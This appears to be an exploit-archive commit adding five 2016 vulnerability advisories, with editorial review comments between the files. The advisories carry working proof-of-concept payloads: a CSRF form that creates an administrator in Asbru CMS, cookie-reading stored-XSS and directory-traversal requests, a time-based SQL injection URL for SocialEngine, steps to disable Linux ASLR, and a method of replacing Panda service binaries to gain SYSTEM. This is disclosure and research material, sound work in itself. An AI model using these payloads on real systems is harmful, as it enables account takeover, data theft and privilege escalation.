DB: 2016-04-07
5 new exploits

Asbru Web Content Management System 9.2.7 - Multiple Vulnerabilities
SocialEngine 4.8.9 - SQL Injection
Linux x86 - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited
Panda Security URL Filtering < 4.3.1.9 - Privilege Escalation
Panda Endpoint Administration Agent < 7.50.00 - Privilege Escalation
parent
60fd0ef490
commit
48af7fb829
6 changed files with 726 additions and 0 deletions
@@ -35888,3 +35888,8 @@ id,file,description,date,author,platform,type,port
39663,platforms/windows/dos/39663.html,"Internet Explorer - MSHTML!CSVGHelpers::SetAttributeStringAndPointer Use-After-Free (MS16-023)",2016-04-05,"Google Security Research",windows,dos,0
39664,platforms/jsp/webapps/39664.txt,"ManageEngine Password Manager Pro 8102 to 8302 - Multiple Vulnerabilities",2016-04-05,S3ba,jsp,webapps,7272
39666,platforms/windows/local/39666.txt,"Windows Kernel Win32k.sys Privilege Escalation Exploit (MS14-058)",2016-04-05,"MWR InfoSecurity",windows,local,0
39667,platforms/jsp/webapps/39667.txt,"Asbru Web Content Management System 9.2.7 - Multiple Vulnerabilities",2016-04-06,LiquidWorm,jsp,webapps,80
39668,platforms/php/webapps/39668.txt,"SocialEngine 4.8.9 - SQL Injection",2016-04-06,"High-Tech Bridge SA",php,webapps,80
39669,platforms/linux/dos/39669.txt,"Linux x86 - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited",2016-04-06,"Hector Marco and Ismael Ripoll",linux,dos,0
39670,platforms/windows/local/39670.txt,"Panda Security URL Filtering < 4.3.1.9 - Privilege Escalation",2016-04-06,"Kyriakos Economou",windows,local,0
39671,platforms/windows/local/39671.txt,"Panda Endpoint Administration Agent < 7.50.00 - Privilege Escalation",2016-04-06,"Kyriakos Economou",windows,local,0
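Review bot: the new 39669 row is filed under platforms/linux/dos with type dos, but the entry describes an ASLR-weakening primitive (its own advisory text says it is "not a exploitable vulnerability by itself"), not a denial of service; a local or misc path and type would classify it more accurately and keep the csv consistent with the other local entries in this hunk.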
445
platforms/jsp/webapps/39667.txt
Executable file
@@ -0,0 +1,445 @@
Asbru Web Content Management System v9.2.7 Multiple Vulnerabilities


Vendor: Asbru Ltd.
Product web page: http://www.asbrusoft.com
Affected version: 9.2.7

Summary: Ready to use, full-featured, database-driven web content management
system (CMS) with integrated community, databases, e-commerce and statistics
modules for creating, publishing and managing rich and user-friendly Internet,
Extranet and Intranet websites.

Desc: Asbru WCM suffers from multiple vulnerabilities including Cross-Site Request
Forgery, Stored Cross-Site Scripting, Open Redirect and Information Disclosure.

Tested on : Apache Tomcat/5.5.23
Apache/2.2.3 (CentOS)


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2016-5314
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5314.php


09.03.2016

--


#1
Directory Traversal:
--------------------

http://10.0.0.7/../../../../../WEB-INF/web.xml


#2
Open Redirect:
--------------

http://10.0.0.7/login_post.jsp?url=http://www.zeroscience.mk


#3
Cross-Site Request Forgery (Add 'administrator' With Full Privileges):
----------------------------------------------------------------------

<html>
<body>
<form action="http://10.0.0.7/webadmin/users/create_post.jsp?id=&redirect=" method="POST">
<input type="hidden" name="userinfo" value=" <TEST></TEST> " />
<input type="hidden" name="title" value="Mr" />
<input type="hidden" name="name" value="Chekmidash" />
<input type="hidden" name="organisation" value="ZSL" />
<input type="hidden" name="email" value="test@testingus.io" />
<input type="hidden" name="gender" value="1" />
<input type="hidden" name="birthdate" value="1984-01-01" />
<input type="hidden" name="birthday" value="01" />
<input type="hidden" name="birthmonth" value="01" />
<input type="hidden" name="birthyear" value="1984" />
<input type="hidden" name="notes" value="CSRFNote" />
<input type="hidden" name="userinfo1" value="" />
<input type="hidden" name="userinfoname" value="" />
<input type="hidden" name="username" value="hackedusername" />
<input type="hidden" name="password" value="password123" />
<input type="hidden" name="userclass" value="administrator" />
<input type="hidden" name="usergroup" value="" />
<input type="hidden" name="usertype" value="" />
<input type="hidden" name="usergroups" value="Account Managers" />
<input type="hidden" name="usergroups" value="Company Bloggers" />
<input type="hidden" name="usergroups" value="Customer" />
<input type="hidden" name="usergroups" value="Event Managers" />
<input type="hidden" name="usergroups" value="Financial Officers" />
<input type="hidden" name="usergroups" value="Forum Moderator" />
<input type="hidden" name="usergroups" value="Human Resources" />
<input type="hidden" name="usergroups" value="Intranet Managers" />
<input type="hidden" name="usergroups" value="Intranet Users" />
<input type="hidden" name="usergroups" value="Newsletter" />
<input type="hidden" name="usergroups" value="Press Officers" />
<input type="hidden" name="usergroups" value="Product Managers" />
<input type="hidden" name="usergroups" value="Registered Users" />
<input type="hidden" name="usergroups" value="Shop Managers" />
<input type="hidden" name="usergroups" value="Subscribers" />
<input type="hidden" name="usergroups" value="Support Ticket Administrators" />
<input type="hidden" name="usergroups" value="Support Ticket Users" />
<input type="hidden" name="usergroups" value="User Managers" />
<input type="hidden" name="usergroups" value="Website Administrators" />
<input type="hidden" name="usergroups" value="Website Developers" />
<input type="hidden" name="users_group" value="" />
<input type="hidden" name="users_type" value="" />
<input type="hidden" name="creators_group" value="" />
<input type="hidden" name="creators_type" value="" />
<input type="hidden" name="editors_group" value="" />
<input type="hidden" name="editors_type" value="" />
<input type="hidden" name="publishers_group" value="" />
<input type="hidden" name="publishers_type" value="" />
<input type="hidden" name="administrators_group" value="" />
<input type="hidden" name="administrators_type" value="" />
<input type="hidden" name="scheduled_publish" value="2016-03-13 00:00" />
<input type="hidden" name="scheduled_publish_email" value="" />
<input type="hidden" name="scheduled_notify" value="" />
<input type="hidden" name="scheduled_notify_email" value="" />
<input type="hidden" name="scheduled_unpublish" value="" />
<input type="hidden" name="scheduled_unpublish_email" value="" />
<input type="hidden" name="invoice_name" value="Icebreaker" />
<input type="hidden" name="invoice_organisation" value="Zero Science Lab" />
<input type="hidden" name="invoice_address" value="nu" />
<input type="hidden" name="invoice_postalcode" value="1300" />
<input type="hidden" name="invoice_city" value="Neverland" />
<input type="hidden" name="invoice_state" value="ND" />
<input type="hidden" name="invoice_country" value="ND" />
<input type="hidden" name="invoice_phone" value="111-222-3333" />
<input type="hidden" name="invoice_fax" value="" />
<input type="hidden" name="invoice_email" value="lab@zeroscience.tld" />
<input type="hidden" name="invoice_website" value="www.zeroscience.mk" />
<input type="hidden" name="delivery_name" value="" />
<input type="hidden" name="delivery_organisation" value="" />
<input type="hidden" name="delivery_address" value="" />
<input type="hidden" name="delivery_postalcode" value="" />
<input type="hidden" name="delivery_city" value="" />
<input type="hidden" name="delivery_state" value="" />
<input type="hidden" name="delivery_country" value="" />
<input type="hidden" name="delivery_phone" value="" />
<input type="hidden" name="delivery_fax" value="" />
<input type="hidden" name="delivery_email" value="" />
<input type="hidden" name="delivery_website" value="" />
<input type="hidden" name="card_type" value="VISA" />
<input type="hidden" name="card_number" value="4444333322221111" />
<input type="hidden" name="card_issuedmonth" value="01" />
<input type="hidden" name="card_issuedyear" value="2016" />
<input type="hidden" name="card_expirymonth" value="01" />
<input type="hidden" name="card_expiryyear" value="2100" />
<input type="hidden" name="card_name" value="Hacker Hackerowsky" />
<input type="hidden" name="card_cvc" value="133" />
<input type="hidden" name="card_issue" value="" />
<input type="hidden" name="card_postalcode" value="1300" />
<input type="hidden" name="content_editor" value="" />
<input type="hidden" name="hardcore_upload" value="" />
<input type="hidden" name="hardcore_format" value="" />
<input type="hidden" name="hardcore_width" value="" />
<input type="hidden" name="hardcore_height" value="" />
<input type="hidden" name="hardcore_onenter" value="" />
<input type="hidden" name="hardcore_onctrlenter" value="" />
<input type="hidden" name="hardcore_onshiftenter" value="" />
<input type="hidden" name="hardcore_onaltenter" value="" />
<input type="hidden" name="hardcore_toolbar1" value="" />
<input type="hidden" name="hardcore_toolbar2" value="" />
<input type="hidden" name="hardcore_toolbar3" value="" />
<input type="hidden" name="hardcore_toolbar4" value="" />
<input type="hidden" name="hardcore_toolbar5" value="" />
<input type="hidden" name="hardcore_formatblock" value="" />
<input type="hidden" name="hardcore_fontname" value="" />
<input type="hidden" name="hardcore_fontsize" value="" />
<input type="hidden" name="hardcore_customscript" value="" />
<input type="hidden" name="startpage" value="" />
<input type="hidden" name="workspace_sections" value="" />
<input type="hidden" name="index_workspace" value="" />
<input type="hidden" name="index_content" value="" />
<input type="hidden" name="index_library" value="" />
<input type="hidden" name="index_product" value="" />
<input type="hidden" name="index_stock" value="" />
<input type="hidden" name="index_order" value="" />
<input type="hidden" name="index_segments" value="" />
<input type="hidden" name="index_usertests" value="" />
<input type="hidden" name="index_heatmaps" value="" />
<input type="hidden" name="index_user" value="" />
<input type="hidden" name="index_websites" value="" />
<input type="hidden" name="menu_selection" value="" />
<input type="hidden" name="statistics_reports" value="" />
<input type="hidden" name="sales_reports" value="" />
<input type="submit" value="Initiate" />
</form>
</body>
</html>


#4
Stored Cross-Site Scripting:
----------------------------

a)


POST /webadmin/content/create_post.jsp?id=&redirect= HTTP/1.1
Host: 10.0.0.7

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="webeditor_stylesheet"

/stylesheet.jsp?id=1,1&device=&useragent=&
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="restore"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="archive"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publish"

Save & Publish
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="scheduled_publish"

2016-03-09 13:29
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="scheduled_unpublish"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="checkedout"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="revision"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="title"

"><script>alert(document.cookie)</script>
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="searchable"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="menuitem"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="file"; filename="test.svg"
Content-Type: image/svg+xml

testsvgxxefailed
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="file_data"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="server_filename"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentdelivery"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image1"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image2"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image3"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="metainfo"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentation"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="author"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="description"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="keywords"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="metainfoname"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentationname"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentationvalue"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentpackage"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentclass"

image
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentgroup"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contenttype"

Photos
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="version_master"

0
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="version"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="device"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="usersegment"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="usertest"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_top"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_up"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_previous"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_next"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_first"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_last"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="related"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="selectrelated"


------WebKitFormBoundarygqlN2AtccVFqx0YN--


b)

POST /webadmin/fileformats/create_post.jsp HTTP/1.1
Host: 10.0.0.7

filenameextension="><script>alert(document.cookie)</script>
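Review bot: the Desc line lists "Cross-Site Request Forgery, Stored Cross-Site Scripting, Open Redirect and Information Disclosure", but the numbered sections do not match it: #1 is titled "Directory Traversal" and its WEB-INF/web.xml request is the information-disclosure case, so the summary and the section headings should use the same names. In #4 b) the request shows only a Host header followed by a bare parameter line, with no Content-Type and no other fields; either mark it as an excerpt showing only the injected parameter or present it in the same full form as #4 a). Also "Tested on :" has a stray space before the colon.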
143
platforms/linux/dos/39669.txt
Executable file
@@ -0,0 +1,143 @@
Source: http://hmarco.org/bugs/CVE-2016-3672-Unlimiting-the-stack-not-longer-disables-ASLR.html

CVE-2016-3672 - Unlimiting the stack not longer disables ASLR
Authors: Hector Marco & Ismael Ripoll
CVE: CVE-2016-3672
Dates: April 2016


Description

We have fixed an old and very known weakness in the Linux ASLR implementation.
Any user able to running 32-bit applications in a x86 machine can disable the ASLR by setting the RLIMIT_STACK resource to unlimited.

Following are the steps to test whether your system is vulnerable or not:

1) Create a dummy program which shows its memory map:

#include <stdio.h>

int main(int argc, const char *argv[])
{
char cmd[256];
sprintf(cmd, "cat /proc/%d/maps", getpid());
system(cmd);
return 0;
}

2) Compile it:

$ gcc show_maps.c -o show_maps # In a i386 machine
$ gcc show_maps.c -o show_maps -m32 # In a 64-bit machine

3) Run the application to check that ASLR is working

$ for i in `seq 1 10`; do ./show_maps | grep "r-xp.*libc"; done
f75c4000-f7769000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f75db000-f7780000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f7557000-f76fc000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f7595000-f773a000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f7574000-f7719000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f75af000-f7754000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f7530000-f76d5000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f7529000-f76ce000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f75c2000-f7767000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f75fe000-f77a3000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so


The libc-2.19.so library is mapped at random positions, so, the ASLR is working properly.
Now, we run the same test but setting the stack to unlimited:


$ ulimit -a | grep stack
stack size (kbytes, -s) 8192
$ ulimit -s unlimited
stack size (kbytes, -s) unlimited
$ for i in `seq 1 10`; do ./show_maps | grep "r-xp.*libc"; done
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so


The libc-2.19.so library is mapped at the same position in all executions: the ASLR has been disabled.
This is a very old trick to disable ASLR, but unfortunately it was still present in current Linux systems.

Vulnerable packages

The weakness, IFAIK is present from the first version of current Linux GIT repository. The first version on this resposiroty is Linux-2.6.12-rc2 dated on April 2005.

Impact

An attacker capable of running 32-bit system applications in a x86 machine is able to disable the ASLR of any application, including sensitive applications such as setuid and setgid. Note that it is not a exploitable vulnerability by itself but a trick to disable the ASLR. This weakness can be use by an attacker when trying to exploit some other bug. Since the i386 is still very used, the number of systems and affected users could be extremely huge.
The wekaness

The issue arises because the ASLR Linux implementation does not randomize always the mmap base address when the stack size is set to unlimited. Concretely, on i386 and on X86_64 when emulating X86_32 in legacy mode, only the stack and the executable are randomized but not other mmapped files (libraries, vDSO, etc.). And depending in the Linux version, the executable is neither randomized.

The function to calculate the libraries position when the stack is set to unlimited is mmap_legacy_base():


static unsigned long mmap_legacy_base(void)
{
if (mmap_is_ia32())
return TASK_UNMAPPED_BASE;
else
return TASK_UNMAPPED_BASE + mmap_rnd();
}


The function doesn't add any random offset when the system is running in a native 32-bit system (i386) or a 32-bit emulated system (x86_32).
Exploit

To exploit this weakness, the attacker just need to set to unlimited the stack and then execute a 32-bit application. Obviously the idea is to execute (attack) privileged applications such as setuid/setgid.
FIX

We have created a patch to fix this issue:


diff --git a/arch/x86/mm/mmap.c b/arch/x86/mm/mmap.c
index 96bd1e2..389939f 100644
--- a/arch/x86/mm/mmap.c
+++ b/arch/x86/mm/mmap.c
@@ -94,18 +94,6 @@ static unsigned long mmap_base(unsigned long rnd)
}

/*
- * Bottom-up (legacy) layout on X86_32 did not support randomization, X86_64
- * does, but not when emulating X86_32
- */
-static unsigned long mmap_legacy_base(unsigned long rnd)
-{
- if (mmap_is_ia32())
- return TASK_UNMAPPED_BASE;
- else
- return TASK_UNMAPPED_BASE + rnd;
-}
-
-/*
* This function, called very early during the creation of a new
* process VM image, sets up which VM layout function to use:
*/
@@ -116,7 +104,7 @@ void arch_pick_mmap_layout(struct mm_struct *mm)
if (current->flags & PF_RANDOMIZE)
random_factor = arch_mmap_rnd();

- mm->mmap_legacy_base = mmap_legacy_base(random_factor);
+ mm->mmap_legacy_base = TASK_UNMAPPED_BASE + random_factor;

if (mmap_is_legacy()) {
mm->mmap_base = mm->mmap_legacy_base;


The patch enables randomization for the libraries, vDSO and mmap requests on i386 and in X86_32 in legacy mode. We already sent the patch to Linux mantainers and the issue will be not problem in incomming Linux versions: Enable full randomization on i386 and X86_32
Discussion

Although this vulnerability is not exploitable by itself, the truth is that the ASLR protection mechanism is useless on local attacks for i386 and x86_32 systems when the attackers are able to attack applications that they can lauch.

Hector Marco - http://hmarco.org
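Review bot: show_maps.c in step 1 includes only <stdio.h> but calls getpid() and system(), so it needs <unistd.h> and <stdlib.h> as well; as written it relies on implicit function declarations, which GCC 14 and later reject by default, so the test program will not build on current toolchains. In the ulimit transcript, the line "stack size (kbytes, -s) unlimited" directly after "$ ulimit -s unlimited" reads as output of that command, which prints nothing; a second "$ ulimit -a | grep stack" should precede it. The mmap_legacy_base() quoted under "The wekaness" takes no argument and calls mmap_rnd(), while the patch below removes a version taking "unsigned long rnd"; the text should quote the same version of the function the patch modifies. Spelling in the prose: "not longer" (title), "wekaness", "IFAIK", "resposiroty", "mantainers", "incomming", "lauch".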
47
platforms/php/webapps/39668.txt
Executable file
@@ -0,0 +1,47 @@
Advisory ID: HTB23286
Product: SocialEngine
Vendor: Webligo
Vulnerable Version(s): 4.8.9 and probably prior
Tested Version: 4.8.9
Advisory Publication: December 21, 2015 [without technical details]
Vendor Notification: December 21, 2015
Public Disclosure: April 6, 2016
Vulnerability Type: SQL Injection [CWE-89]
Risk Level: High
CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L]
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered SQL-Injection vulnerability in a popular social networking software SocialEngine. The vulnerability can be exploited to gain access to potentially sensitive information in database and compromise the entire website.

The vulnerability exists due to insufficient filtration of input data passed via the "orderby" HTTP GET parameter to "/index.php" script. A remote unauthenticated attacker can modify present query and execute arbitrary SQL commands in application's database.

A simple exploit below uses time-based SQL injection technique to demonstrate existence of the vulnerability. The following HTTP request will make page render for 99 seconds, if MySQL server version is is equal "5":

http://[host]/blogs/?category=0&end_date=&orderby=1%20AND%20%28SELECT%20*%20FROM%20%28SELECT%28SLEEP%28IF%28MID%28version%28%29,1,1%29%20LIKE%205,99,0%29%29%29%29MTeU%29

-----------------------------------------------------------------------------------------------

Solution:

Update to SocialEngine 4.8.10

More Information:
http://blog.socialengine.com/2016/01/20/socialengine-php-4-8-10-is-released/

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23286 - https://www.htbridge.com/advisory/HTB23286 - SQL Injection in SocialEngine
[2] SocialEngine - http://www.socialengine.com/ - SocialEngine is PHP community software that helps you build your own custom social network website. Advanced social networking features include blogs, photo albums, user groups and forums, providing complete control over the layout and functionality of your social network, community, forum, or portal.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
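Review bot: the CVSSv3 base score is stated as 7.1, but the vector CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L evaluates to 7.3 under the CVSS 3.0 formula, so the score and the vector disagree and one of them should be corrected. In "Advisory Details", "is is equal "5"" has a doubled word, and since the PoC tests MID(version(),1,1) LIKE 5 the condition is "the version string starts with 5", i.e. any MySQL 5.x server, which the sentence should say rather than "is equal "5"".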
46
platforms/windows/local/39670.txt
Executable file
@@ -0,0 +1,46 @@
* CVE: CVE-2015-7378
* Vendor: Panda Security
* Reported by: Kyriakos Economou
* Date of Release: 05/04/2016
* Affected Products: Multiple
* Affected Version: Panda Security URL Filtering < v4.3.1.9
* Fixed Version: Panda Security URL Filtering v4.3.1.9

Description:
All Panda Security 2016 Home User products for Windows are vulnerable to privilege escalation, which allows a local attacker to execute code as SYSTEM from any account (Guest included), thus completely compromising the affected host.


Affected Products:

Panda Gold Protection 2016 v16.0.1
Panda Global Protection 2016 v16.0.1
Panda Internet Security 2016 v16.0.1
Panda Antivirus Pro 2016 v16.0.1
Panda Free Antivirus v16.0.1


Impact:

A local attacker can elevate his privileges from any user account and execute code as SYSTEM.


Technical Details:

By default all the aforementioned products install (current version:4.3.0.4), which creates a service named 'panda_url_filtering' that runs as SYSTEM.
The executable modules are by default installed in "C:\ProgramData\Panda Security URL Filtering" directory.
However, the ACLs assigned to the directory itself, and to the rest of the installed files, allow any user to modify those files and/or substitute them with malicious ones.
A local attacker can easily execute code with SYSTEM account privileges by modifying or substituting the main executable module of this service, 'Panda_URL_Filteringb.exe', which will run at the next reboot of the host.


Disclosure Log:
Vendor Contacted: 28/09/2015
Public Disclosure: 05/04/2016

Copyright:
Copyright (c) Nettitude Limited 2016, All rights reserved worldwide.

Disclaimer:
The information herein contained may change without notice. Any use of this information is at the user's risk and discretion and is provided with no warranties. Nettitude and the author cannot be held liable for any impact resulting from the use of this information.

Kyriakos Economou
Vulnerability Researcher
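Review bot: the first sentence of Technical Details is missing its object: "all the aforementioned products install (current version:4.3.0.4), which creates a service" should say what is installed, presumably the Panda Security URL Filtering component named in the header and in the directory path that follows. The "(current version:4.3.0.4)" in the body and "Affected Version: < v4.3.1.9" in the header should also be reconciled by stating that 4.3.0.4 was the build tested. For readers verifying the fix, the remediation check that follows from the text is that the directory "C:\ProgramData\Panda Security URL Filtering" and its files no longer grant modify rights to unprivileged users after updating to v4.3.1.9; stating that explicitly would make the advisory actionable.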
40
platforms/windows/local/39671.txt
Executable file
@@ -0,0 +1,40 @@
* CVE: CVE-2016-3943
* Vendor: Panda Security
* Reported by: Kyriakos Economou
* Date of Release: 05/04/2016
* Affected Products: Multiple
* Affected Version: Panda Endpoint Administration Agent < v7.50.00
* Fixed Version: Panda Endpoint Administration Agent v7.50.00


Description:
Panda Endpoint Administration Agent v7.30.2 allows a local attacker to elevate his privileges from any account type (Guest included) and execute code as SYSTEM, thus completely compromising the affected host.


Affected Products:

Any Panda Security For Business products for Windows using this Agent service are vulnerable.


Technical Details:

Upon installing some Panda Security for Business products for Windows, such as Panda Endpoint Protection/Plus, a service named as 'Panda Endpoint Administration Agent' is installed in the host. This service runs under the SYSTEM account. However, due to weak ACLs set to the installation directory ("C:\Program Files\Panda Security\WaAgent") of this application and its subdirectories, any user can modify or overwrite any executable module (dynamic link libraries and executables) installed in those directories.


Impact:

A local attacker can elevate his privileges from any user account and execute code as SYSTEM.


Disclosure Log:
Vendor Contacted: 12/01/2016
Public Disclosure: 05/04/2016

Copyright:
Copyright (c) Nettitude Limited 2016, All rights reserved worldwide.

Disclaimer:
The information herein contained may change without notice. Any use of this information is at the user's risk and discretion and is provided with no warranties. Nettitude and the author cannot be held liable for any impact resulting from the use of this information.

Kyriakos Economou
Vulnerability Researcher
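Review bot: the Description names v7.30.2 as the vulnerable build while the header gives "< v7.50.00" as the affected range; the text should state that 7.30.2 was the version tested and that earlier releases are assumed affected, so the two do not read as contradictory. Technical Details describes the weak ACLs on "C:\Program Files\Panda Security\WaAgent" but gives no way to confirm the fix; noting that on v7.50.00 the directory and its subdirectories should no longer grant write or modify access to unprivileged users would let administrators verify remediation.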